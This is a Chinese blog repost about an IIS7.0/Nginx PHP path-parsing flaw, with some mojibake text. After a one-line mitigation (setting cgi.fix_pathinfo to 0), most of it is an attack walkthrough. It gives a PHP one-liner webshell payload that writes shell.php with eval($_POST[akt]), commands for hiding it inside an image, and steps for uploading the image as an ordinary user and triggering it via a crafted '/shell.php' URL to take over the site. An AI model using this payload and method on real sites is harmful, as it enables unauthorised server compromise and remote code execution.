iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通殺漏洞,和Nginx上次的0day一樣。使用iis7.0的注意了。臨時(shí)解決辦法:關(guān)閉cgi.fix_pathinfo為0
Nginx好像又爆0day了,windows下可任意查看和下載腳本文件 王猛 IIS7.0畸形解析0day通殺漏洞,和Nginx上次的0day一樣。使用iis7.0的注意了。
臨時(shí)解決辦法:關(guān)閉cgi.fix_pathinfo為0
__________________________________
先說(shuō)一下Nginx那個(gè)0day(出來(lái)有幾天了,因?yàn)榻榻B的網(wǎng)站很多,所以當(dāng)時(shí)就沒(méi)轉(zhuǎn)載)
先合并一張PHP一句話(huà)圖片馬,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,進(jìn)行圖片和一句話(huà)木馬的合并,一句話(huà)代碼為"<?fputs (fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"
圖片隨便找一張.
一句話(huà):<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[akt])?>');?>
然后找個(gè)nginx的站,先注冊(cè)一個(gè)用戶(hù)然后在論壇上傳一張我們剛剛合并的圖片一句話(huà)?cǎi)R。
找到圖片地址,然后在地址后面加個(gè)shell.php,在瀏覽器中運(yùn)行。
比如假設(shè)圖片地址為 www.webshell.cc/tupian/1.jpg
則執(zhí)行地址為 www.webshell.cc/tupian/1.jpg/shell.php
然后,會(huì)在目錄下生成shell.php。比如: www.xxx.com/tupian/shell.php
shell.php就是我們的一句話(huà)地址。再拿一句話(huà)的客戶(hù)端連接這個(gè)一句話(huà)地址就好。
上面就是Nginx拿站全過(guò)程,IIS7.0的畸形解析和這個(gè)類(lèi)似。
找到某個(gè)使用IIS7.0架設(shè)的站,然后找到其中的圖片上傳點(diǎn)(不需要管理權(quán)限,普通注冊(cè)用戶(hù)即可搞定),把PHP大馬后綴改成.jpg,傳上去,得到圖片地址。
在圖片格式后面添加xx.php xx隨便你怎么填。只要后綴為.php就好。
剩下的就隨便你去搞吧。
轉(zhuǎn)載請(qǐng)注明來(lái)自WebShell'S Blog,本文地址:https://www.webshell.cc/1638.html
總結(jié)
以上是生活随笔為你收集整理的iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 给模型加装饰器Java,装饰器设计模式
- 下一篇: 梦里花开如梦是哪首歌啊?